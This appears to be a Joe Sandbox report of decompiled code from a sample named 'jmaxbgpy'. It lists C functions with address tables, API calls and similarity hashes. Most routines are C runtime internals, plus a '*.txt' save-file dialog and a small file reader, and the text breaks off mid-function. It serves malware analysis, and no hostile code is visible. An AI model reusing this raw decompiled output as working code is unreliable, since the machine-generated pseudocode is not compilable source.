                                                                    0x00404b5e
                                                                    0x00404b66
                                                                    0x00404b6d
                                                                    0x00404b72
                                                                    0x00404b77
                                                                    0x00404b79
                                                                    0x00404bde
                                                                    0x00404bde
                                                                    0x00000000
                                                                    0x00404b7b
                                                                    0x00404b7b
                                                                    0x00404b8e
                                                                    0x00404b90
                                                                    0x00404b95
                                                                    0x00404b98
                                                                    0x00000000
                                                                    0x00404b9a
                                                                    0x00404ba6
                                                                    0x00404baa
                                                                    0x00404bac
                                                                    0x00000000
                                                                    0x00404bae
                                                                    0x00404bbf
                                                                    0x00404bc1
                                                                    0x00000000
                                                                    0x00404bc3
                                                                    0x00404bc3
                                                                    0x00404bc5
                                                                    0x00404bc6
                                                                    0x00404bcd
                                                                    0x00404bd3
                                                                    0x00404bd7
                                                                    0x00404bdb
                                                                    0x00404bdb
                                                                    0x00404bc1
                                                                    0x00404bac
                                                                    0x00404b98
                                                                    0x00404b79
                                                                    0x00404b2d
                                                                    0x00404be7
                                                                    0x00404a81
                                                                    0x00404a81
                                                                    0x00404a89
                                                                    0x00404a89

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00401D3C,0040BD30,00000014), ref: 00404A75
                                                                    • __mtterm.LIBCMT ref: 00404A81
                                                                      • Part of subcall function 004047BA: DecodePointer.KERNEL32(00000006,00404BE3,?,00401D3C,0040BD30,00000014), ref: 004047CB
                                                                      • Part of subcall function 004047BA: TlsFree.KERNEL32(00000020,00404BE3,?,00401D3C,0040BD30,00000014), ref: 004047E5
                                                                      • Part of subcall function 004047BA: DeleteCriticalSection.KERNEL32(00000000,00000000,770EF3A0,?,00404BE3,?,00401D3C,0040BD30,00000014), ref: 00405641
                                                                      • Part of subcall function 004047BA: _free.LIBCMT ref: 00405644
                                                                      • Part of subcall function 004047BA: DeleteCriticalSection.KERNEL32(00000020,770EF3A0,?,00404BE3,?,00401D3C,0040BD30,00000014), ref: 0040566B
                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00404A97
                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00404AA4
                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00404AB1
                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00404ABE
                                                                    • TlsAlloc.KERNEL32(?,00401D3C,0040BD30,00000014), ref: 00404B0E
                                                                    • TlsSetValue.KERNEL32(00000000,?,00401D3C,0040BD30,00000014), ref: 00404B29
                                                                    • __init_pointers.LIBCMT ref: 00404B33
                                                                    • EncodePointer.KERNEL32(?,00401D3C,0040BD30,00000014), ref: 00404B44
                                                                    • EncodePointer.KERNEL32(?,00401D3C,0040BD30,00000014), ref: 00404B51
                                                                    • EncodePointer.KERNEL32(?,00401D3C,0040BD30,00000014), ref: 00404B5E
                                                                    • EncodePointer.KERNEL32(?,00401D3C,0040BD30,00000014), ref: 00404B6B
                                                                    • DecodePointer.KERNEL32(0040493E,?,00401D3C,0040BD30,00000014), ref: 00404B8C
                                                                    • __calloc_crt.LIBCMT ref: 00404BA1
                                                                    • DecodePointer.KERNEL32(00000000,?,00401D3C,0040BD30,00000014), ref: 00404BBB
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00404BCD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                    • API String ID: 3698121176-3819984048
                                                                    • Opcode ID: de8ea7325842226b26a94288a43d877f1faeaae93b65026cf3cfce122ee4b1b9
                                                                    • Instruction ID: 4d56c687a942cfe68940f70576ccb124e69fbba44ae95c6f1b7ec867be579456
                                                                    • Opcode Fuzzy Hash: de8ea7325842226b26a94288a43d877f1faeaae93b65026cf3cfce122ee4b1b9
                                                                    • Instruction Fuzzy Hash: E931AF729503159AD711BF77AE086063BE4FB82364B14893BE554B32F0DB389468CE9D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 91%
                                                                    			E004047F7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t26;
                                                                    				intOrPtr _t30;
                                                                    				intOrPtr _t40;
                                                                    				void* _t41;
                                                                    
                                                                    				_t31 = __ebx;
                                                                    				_push(8);
                                                                    				_push(0x40be18);
                                                                    				E00403000(__ebx, __edi, __esi);
                                                                    				GetModuleHandleW(L"KERNEL32.DLL");
                                                                    				_t40 =  *((intOrPtr*)(_t41 + 8));
                                                                    				 *((intOrPtr*)(_t40 + 0x5c)) = 0x40ad78;
                                                                    				 *(_t40 + 8) =  *(_t40 + 8) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t40 + 0x14)) = 1;
                                                                    				 *((intOrPtr*)(_t40 + 0x70)) = 1;
                                                                    				 *((char*)(_t40 + 0xc8)) = 0x43;
                                                                    				 *((char*)(_t40 + 0x14b)) = 0x43;
                                                                    				 *(_t40 + 0x68) = 0x40d700;
                                                                    				E00405754(__ebx, 1, 0xd);
                                                                    				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                    				InterlockedIncrement( *(_t40 + 0x68));
                                                                    				 *(_t41 - 4) = 0xfffffffe;
                                                                    				E00404899();
                                                                    				E00405754(_t31, 1, 0xc);
                                                                    				 *(_t41 - 4) = 1;
                                                                    				_t26 =  *((intOrPtr*)(_t41 + 0xc));
                                                                    				 *((intOrPtr*)(_t40 + 0x6c)) = _t26;
                                                                    				if(_t26 == 0) {
                                                                    					_t30 =  *0x40de68; // 0x40dd90
                                                                    					 *((intOrPtr*)(_t40 + 0x6c)) = _t30;
                                                                    				}
                                                                    				E00407C49( *((intOrPtr*)(_t40 + 0x6c)));
                                                                    				 *(_t41 - 4) = 0xfffffffe;
                                                                    				return E00403045(E004048A2());
                                                                    			}







                                                                    0x004047f7
                                                                    0x004047f7
                                                                    0x004047f9
                                                                    0x004047fe
                                                                    0x00404808
                                                                    0x0040480e
                                                                    0x00404811
                                                                    0x00404818
                                                                    0x0040481f
                                                                    0x00404822
                                                                    0x00404825
                                                                    0x0040482c
                                                                    0x00404833
                                                                    0x0040483c
                                                                    0x00404842
                                                                    0x00404849
                                                                    0x0040484f
                                                                    0x00404856
                                                                    0x0040485d
                                                                    0x00404863
                                                                    0x00404866
                                                                    0x00404869
                                                                    0x0040486e
                                                                    0x00404870
                                                                    0x00404875
                                                                    0x00404875
                                                                    0x0040487b
                                                                    0x00404881
                                                                    0x00404892

                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040BE18,00000008,004048FF,00000000,00000000,?,004012ED,?,0040BC70), ref: 00404808
                                                                    • __lock.LIBCMT ref: 0040483C
                                                                      • Part of subcall function 00405754: __mtinitlocknum.LIBCMT ref: 0040576A
                                                                      • Part of subcall function 00405754: __amsg_exit.LIBCMT ref: 00405776
                                                                      • Part of subcall function 00405754: EnterCriticalSection.KERNEL32(?,?,?,00404841,0000000D), ref: 0040577E
                                                                    • InterlockedIncrement.KERNEL32(0040D700), ref: 00404849
                                                                    • __lock.LIBCMT ref: 0040485D
                                                                    • ___addlocaleref.LIBCMT ref: 0040487B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                    • String ID: KERNEL32.DLL
                                                                    • API String ID: 637971194-2576044830
                                                                    • Opcode ID: 9d216441a787e05cde8a9db640a44f76e12559924f11d1b1b2ca9dc4952554dd
                                                                    • Instruction ID: b5c3929eb2d820e3cafa30b792c3722ce931152f23df00cbee1c918348bf395a
                                                                    • Opcode Fuzzy Hash: 9d216441a787e05cde8a9db640a44f76e12559924f11d1b1b2ca9dc4952554dd
                                                                    • Instruction Fuzzy Hash: 58016575441B00DBE720AF66D945749BBE0AF40315F20892FE595B73E0CBB8A644CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E00401135(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                    				void* _v524;
                                                                    				void* _t11;
                                                                    				int _t18;
                                                                    				void* _t20;
                                                                    				struct HWND__* _t21;
                                                                    				unsigned int _t24;
                                                                    				signed int _t26;
                                                                    
                                                                    				_t11 = _a8 - 0x4e;
                                                                    				if(_t11 == 0) {
                                                                    					if( *((intOrPtr*)(_a16 + 8)) == 0xfffffda6 &&  *0x410c8c != 0) {
                                                                    						SendMessageW(GetParent(_a4), 0x465, 0,  &_v524);
                                                                    						_t18 = E004010AE( &_v524);
                                                                    						if(_t18 != 0xffffffff) {
                                                                    							 *0x410c88 = _t18;
                                                                    							SendMessageW( *0x40eda4, 0x14e, _t18, 0);
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_t20 = _t11 - 0xc2;
                                                                    					if(_t20 == 0) {
                                                                    						_t21 = GetDlgItem(_a4, 0x191);
                                                                    						 *0x40eda4 = _t21;
                                                                    						SendMessageW(_t21, 0x14e,  *0x410c88, 0);
                                                                    					} else {
                                                                    						if(_t20 == 1) {
                                                                    							_t24 = _a12;
                                                                    							if(_t24 == 0x191 && _t24 >> 0x10 == 1) {
                                                                    								_t26 = SendMessageW( *0x40eda4, 0x147, 0, 0);
                                                                    								_t3 = _t26 + 1; // 0x1
                                                                    								asm("sbb ecx, ecx");
                                                                    								 *0x410c88 =  ~_t3 & _t26;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return 0;
                                                                    			}










                                                                    0x00401141
                                                                    0x00401144
                                                                    0x004011ce
                                                                    0x004011f8
                                                                    0x00401201
                                                                    0x00401209
                                                                    0x00401219
                                                                    0x0040121e
                                                                    0x0040121e
                                                                    0x00401220
                                                                    0x00401146
                                                                    0x00401146
                                                                    0x0040114b
                                                                    0x004011a3
                                                                    0x004011b1
                                                                    0x004011bc
                                                                    0x0040114d
                                                                    0x0040114e
                                                                    0x00401154
                                                                    0x0040115f
                                                                    0x00401181
                                                                    0x00401187
                                                                    0x0040118c
                                                                    0x00401190
                                                                    0x00401190
                                                                    0x0040115f
                                                                    0x0040114e
                                                                    0x0040114b
                                                                    0x00401224

                                                                    APIs
                                                                    • SendMessageW.USER32(00000147,00000000,00000000), ref: 00401181
                                                                    • GetDlgItem.USER32 ref: 004011A3
                                                                    • SendMessageW.USER32(00000000,0000014E,00000000), ref: 004011BC
                                                                    • GetParent.USER32(FFFFFDA6), ref: 004011EB
                                                                    • SendMessageW.USER32(00000000), ref: 004011F8
                                                                    • SendMessageW.USER32(0000014E,00000000,00000000), ref: 0040121E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$ItemParent
                                                                    • String ID:
                                                                    • API String ID: 2505470899-0
                                                                    • Opcode ID: bacd3e6e7ea216cd5d098e5ee6b477450f63389451edd86b1a2234161c836720
                                                                    • Instruction ID: 0d8c02cdad4dd76c2dee49f39db750999e363f221b84886a1f897c1a2d9267b5
                                                                    • Opcode Fuzzy Hash: bacd3e6e7ea216cd5d098e5ee6b477450f63389451edd86b1a2234161c836720
                                                                    • Instruction Fuzzy Hash: DD21A571640305BAEF245F68ED49FAE3764EB04700F004A7AF515FA2F1DAB899A09B4D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E0040771D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t15;
                                                                    				LONG* _t21;
                                                                    				void* _t29;
                                                                    				void* _t31;
                                                                    				LONG* _t33;
                                                                    				void* _t34;
                                                                    				void* _t35;
                                                                    
                                                                    				_t35 = __eflags;
                                                                    				_t29 = __edx;
                                                                    				_t25 = __ebx;
                                                                    				_push(0xc);
                                                                    				_push(0x40bfb0);
                                                                    				E00403000(__ebx, __edi, __esi);
                                                                    				_t31 = E00404924(__ebx, _t35);
                                                                    				_t15 =  *0x40de6c; // 0xfffffffe
                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                    					E00405754(_t25, _t31, 0xd);
                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                    					_t33 =  *(_t31 + 0x68);
                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                    					__eflags = _t33 -  *0x40db28; // 0x921610
                                                                    					if(__eflags != 0) {
                                                                    						__eflags = _t33;
                                                                    						if(__eflags != 0) {
                                                                    							__eflags = InterlockedDecrement(_t33);
                                                                    							if(__eflags == 0) {
                                                                    								__eflags = _t33 - 0x40d700;
                                                                    								if(__eflags != 0) {
                                                                    									E00405897(_t33);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_t21 =  *0x40db28; // 0x921610
                                                                    						 *(_t31 + 0x68) = _t21;
                                                                    						_t33 =  *0x40db28; // 0x921610
                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                    						InterlockedIncrement(_t33);
                                                                    					}
                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                    					E004077B8();
                                                                    				} else {
                                                                    					_t33 =  *(_t31 + 0x68);
                                                                    				}
                                                                    				_t38 = _t33;
                                                                    				if(_t33 == 0) {
                                                                    					_push(0x20);
                                                                    					E00402603(_t29, _t38);
                                                                    				}
                                                                    				return E00403045(_t33);
                                                                    			}










                                                                    0x0040771d
                                                                    0x0040771d
                                                                    0x0040771d
                                                                    0x0040771d
                                                                    0x0040771f
                                                                    0x00407724
                                                                    0x0040772e
                                                                    0x00407730
                                                                    0x00407738
                                                                    0x00407759
                                                                    0x0040775f
                                                                    0x00407763
                                                                    0x00407766
                                                                    0x00407769
                                                                    0x0040776f
                                                                    0x00407771
                                                                    0x00407773
                                                                    0x0040777c
                                                                    0x0040777e
                                                                    0x00407780
                                                                    0x00407786
                                                                    0x00407789
                                                                    0x0040778e
                                                                    0x00407786
                                                                    0x0040777e
                                                                    0x0040778f
                                                                    0x00407794
                                                                    0x00407797
                                                                    0x0040779d
                                                                    0x004077a1
                                                                    0x004077a1
                                                                    0x004077a7
                                                                    0x004077ae
                                                                    0x00407740
                                                                    0x00407740
                                                                    0x00407740
                                                                    0x00407743
                                                                    0x00407745
                                                                    0x00407747
                                                                    0x00407749
                                                                    0x0040774e
                                                                    0x00407756

                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00407729
                                                                      • Part of subcall function 00404924: __getptd_noexit.LIBCMT ref: 00404927
                                                                      • Part of subcall function 00404924: __amsg_exit.LIBCMT ref: 00404934
                                                                    • __amsg_exit.LIBCMT ref: 00407749
                                                                    • __lock.LIBCMT ref: 00407759
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00407776
                                                                    • _free.LIBCMT ref: 00407789
                                                                    • InterlockedIncrement.KERNEL32(00921610), ref: 004077A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    • Opcode ID: db1aa73358f921c15d0199ed878d81424a853ea85ca0216e2153f711cbaae55c
                                                                    • Instruction ID: 3557f6ff03c0df2dabb3fb50ebdc95eb000e0edf765d5e69fab61f274e36445a
                                                                    • Opcode Fuzzy Hash: db1aa73358f921c15d0199ed878d81424a853ea85ca0216e2153f711cbaae55c
                                                                    • Instruction Fuzzy Hash: 9B01AD36D046119BDB10AFA5994576A7BA0AB04765F14003BE814B72C0CB7C7984CFDE
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E00401227() {
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _v24;
                                                                    				intOrPtr _v32;
                                                                    				intOrPtr _v40;
                                                                    				signed int _v60;
                                                                    				WCHAR* _v64;
                                                                    				intOrPtr _v80;
                                                                    				intOrPtr _v84;
                                                                    				intOrPtr _v88;
                                                                    				struct tagOFNA _v92;
                                                                    				short _v612;
                                                                    				signed int _t25;
                                                                    
                                                                    				E00403BB0( &_v92, 0, 0x58);
                                                                    				lstrcpyW( &_v612, L"*.txt");
                                                                    				_v60 = _v60 & 0x00000000;
                                                                    				 *0x410c8c =  *0x410c8c & 0x00000000;
                                                                    				_v88 =  *0x40ff24;
                                                                    				_v84 =  *0x40ff20;
                                                                    				_v64 =  &_v612;
                                                                    				 *0x410c88 =  *0x4107c0;
                                                                    				_v92 = 0x58;
                                                                    				_v80 = 0x4107c4;
                                                                    				_v40 = 0x880866;
                                                                    				_v24 = E00401135;
                                                                    				_v20 = 0x190;
                                                                    				_v32 = 0x40bb7c;
                                                                    				_t25 = GetSaveFileNameW( &_v92);
                                                                    				asm("sbb eax, eax");
                                                                    				return  ~( ~_t25);
                                                                    			}















                                                                    0x00401238
                                                                    0x0040124c
                                                                    0x00401257
                                                                    0x0040125b
                                                                    0x00401262
                                                                    0x0040126a
                                                                    0x00401273
                                                                    0x0040127b
                                                                    0x00401284
                                                                    0x0040128b
                                                                    0x00401292
                                                                    0x00401299
                                                                    0x004012a0
                                                                    0x004012a7
                                                                    0x004012ae
                                                                    0x004012b6
                                                                    0x004012bb

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: FileNameSave_memsetlstrcpy
                                                                    • String ID: *.txt$X
                                                                    • API String ID: 524411262-2927553402
                                                                    • Opcode ID: 8d5d449e4a07b04af6f1dacc405564c989e4a278f2041ff359069a8edf452e22
                                                                    • Instruction ID: f664026614712bbf0293b0b81b40adf26b2fd662ef35f7a9a1852ab15b17921b
                                                                    • Opcode Fuzzy Hash: 8d5d449e4a07b04af6f1dacc405564c989e4a278f2041ff359069a8edf452e22
                                                                    • Instruction Fuzzy Hash: 23011771D4024D8BCB50DFD4D989BDE7BF4BB08305F00417AE411BA294EBB4664C8F88
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E004082E1(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                                                    				void* _t7;
                                                                    				long _t8;
                                                                    				intOrPtr* _t9;
                                                                    				intOrPtr* _t12;
                                                                    				long _t27;
                                                                    				long _t30;
                                                                    
                                                                    				if(_a4 != 0) {
                                                                    					_push(__esi);
                                                                    					_t30 = _a8;
                                                                    					__eflags = _t30;
                                                                    					if(_t30 != 0) {
                                                                    						_push(__edi);
                                                                    						while(1) {
                                                                    							__eflags = _t30 - 0xffffffe0;
                                                                    							if(_t30 > 0xffffffe0) {
                                                                    								break;
                                                                    							}
                                                                    							__eflags = _t30;
                                                                    							if(_t30 == 0) {
                                                                    								_t30 = _t30 + 1;
                                                                    								__eflags = _t30;
                                                                    							}
                                                                    							_t7 = HeapReAlloc( *0x40e8d0, 0, _a4, _t30);
                                                                    							_t27 = _t7;
                                                                    							__eflags = _t27;
                                                                    							if(_t27 != 0) {
                                                                    								L17:
                                                                    								_t8 = _t27;
                                                                    							} else {
                                                                    								__eflags =  *0x40ed98 - _t7;
                                                                    								if(__eflags == 0) {
                                                                    									_t9 = E00402FAC(__eflags);
                                                                    									 *_t9 = E00402F6A(GetLastError());
                                                                    									goto L17;
                                                                    								} else {
                                                                    									__eflags = E004059E4(_t7, _t30);
                                                                    									if(__eflags == 0) {
                                                                    										_t12 = E00402FAC(__eflags);
                                                                    										 *_t12 = E00402F6A(GetLastError());
                                                                    										L12:
                                                                    										_t8 = 0;
                                                                    										__eflags = 0;
                                                                    									} else {
                                                                    										continue;
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							goto L14;
                                                                    						}
                                                                    						E004059E4(_t6, _t30);
                                                                    						 *((intOrPtr*)(E00402FAC(__eflags))) = 0xc;
                                                                    						goto L12;
                                                                    					} else {
                                                                    						E00405897(_a4);
                                                                    						_t8 = 0;
                                                                    					}
                                                                    					L14:
                                                                    					return _t8;
                                                                    				} else {
                                                                    					return E004081CB(__edx, __edi, __esi, _a8);
                                                                    				}
                                                                    			}









                                                                    0x004082ea
                                                                    0x004082f7
                                                                    0x004082f8
                                                                    0x004082fb
                                                                    0x004082fd
                                                                    0x0040830c
                                                                    0x0040833f
                                                                    0x0040833f
                                                                    0x00408342
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040830f
                                                                    0x00408311
                                                                    0x00408313
                                                                    0x00408313
                                                                    0x00408313
                                                                    0x00408320
                                                                    0x00408326
                                                                    0x00408328
                                                                    0x0040832a
                                                                    0x0040838a
                                                                    0x0040838a
                                                                    0x0040832c
                                                                    0x0040832c
                                                                    0x00408332
                                                                    0x00408374
                                                                    0x00408388
                                                                    0x00000000
                                                                    0x00408334
                                                                    0x0040833b
                                                                    0x0040833d
                                                                    0x0040835c
                                                                    0x00408370
                                                                    0x00408356
                                                                    0x00408356
                                                                    0x00408356
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040833d
                                                                    0x00408332
                                                                    0x00000000
                                                                    0x00408358
                                                                    0x00408345
                                                                    0x00408350
                                                                    0x00000000
                                                                    0x004082ff
                                                                    0x00408302
                                                                    0x00408308
                                                                    0x00408308
                                                                    0x00408359
                                                                    0x0040835b
                                                                    0x004082ec
                                                                    0x004082f6
                                                                    0x004082f6

                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 004082EF
                                                                      • Part of subcall function 004081CB: __FF_MSGBANNER.LIBCMT ref: 004081E4
                                                                      • Part of subcall function 004081CB: __NMSG_WRITE.LIBCMT ref: 004081EB
                                                                      • Part of subcall function 004081CB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00405798,?,00000001,?,?,004056DF,00000018,0040BEA8,0000000C,0040576F), ref: 00408210
                                                                    • _free.LIBCMT ref: 00408302
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap_free_malloc
                                                                    • String ID:
                                                                    • API String ID: 1020059152-0
                                                                    • Opcode ID: db367894314d0baa7c0d9a906219645e3213dedaa1e0aeae343aeb1fe72ca667
                                                                    • Instruction ID: 985adc6529d598a0834f23f18eea137b515e4eb76e5aec6dc9403444eadbd7b6
                                                                    • Opcode Fuzzy Hash: db367894314d0baa7c0d9a906219645e3213dedaa1e0aeae343aeb1fe72ca667
                                                                    • Instruction Fuzzy Hash: C411B632404616EACB213B71AE0965B3B54AFC47A4B24443FFC88BB2D1DF3D8841965D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 73%
                                                                    			E004010AE(long _a4) {
                                                                    				void _v260;
                                                                    				signed int _t6;
                                                                    				long _t7;
                                                                    				int _t9;
                                                                    				void* _t16;
                                                                    
                                                                    				_t6 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                                                    				_t16 = _t6;
                                                                    				if(_t16 != 0xffffffff) {
                                                                    					_t7 = GetFileSize(_t16, 0);
                                                                    					if(_t7 != 0xffffffff) {
                                                                    						if(_t7 >= 0xff) {
                                                                    							_t7 = 0xff;
                                                                    						}
                                                                    						_t9 = ReadFile(_t16,  &_v260, _t7,  &_a4, 0);
                                                                    						_push(_t16);
                                                                    						if(_t9 == 0) {
                                                                    							L4:
                                                                    							_t6 = CloseHandle();
                                                                    							goto L1;
                                                                    						} else {
                                                                    							CloseHandle();
                                                                    							return E00401059( &_a4,  &_v260, _a4);
                                                                    						}
                                                                    					}
                                                                    					_push(_t16);
                                                                    					goto L4;
                                                                    				}
                                                                    				L1:
                                                                    				return _t6 | 0xffffffff;
                                                                    			}








                                                                    0x004010cd
                                                                    0x004010d3
                                                                    0x004010d8
                                                                    0x004010e2
                                                                    0x004010eb
                                                                    0x004010fd
                                                                    0x004010ff
                                                                    0x004010ff
                                                                    0x00401110
                                                                    0x00401116
                                                                    0x00401119
                                                                    0x004010ee
                                                                    0x004010ee
                                                                    0x00000000
                                                                    0x0040111b
                                                                    0x0040111b
                                                                    0x00000000
                                                                    0x0040112b
                                                                    0x00401119
                                                                    0x004010ed
                                                                    0x00000000
                                                                    0x004010ed
                                                                    0x004010da
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004010CD
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004010E2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004010EE
                                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00401110
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040111B
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.328795937.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000001.00000002.328788396.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328950350.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000001.00000002.328962252.000000000040D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_jmaxbgpy.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$CreateReadSize
                                                                    • String ID:
                                                                    • API String ID: 3664964396-0
                                                                    • Opcode ID: 5afe4b0554948212e5a64fa6429751ffd0bb97ff0bc077c8538de818678df1c6
                                                                    • Instruction ID: b98558af738958c3e5cd2301574842c7b46419177d3f3481a3a185a09d2837c8
                                                                    • Opcode Fuzzy Hash: 5afe4b0554948212e5a64fa6429751ffd0bb97ff0bc077c8538de818678df1c6
                                                                    • Instruction Fuzzy Hash: C601D031501214BBD7311B70DD05FDA362C9B05365F104335F751F90E0DBB99991875D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E00407F09(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t12;
                                                                    				void* _t25;
                                                                    				void* _t28;
                                                                    				intOrPtr _t29;
                                                                    				void* _t30;
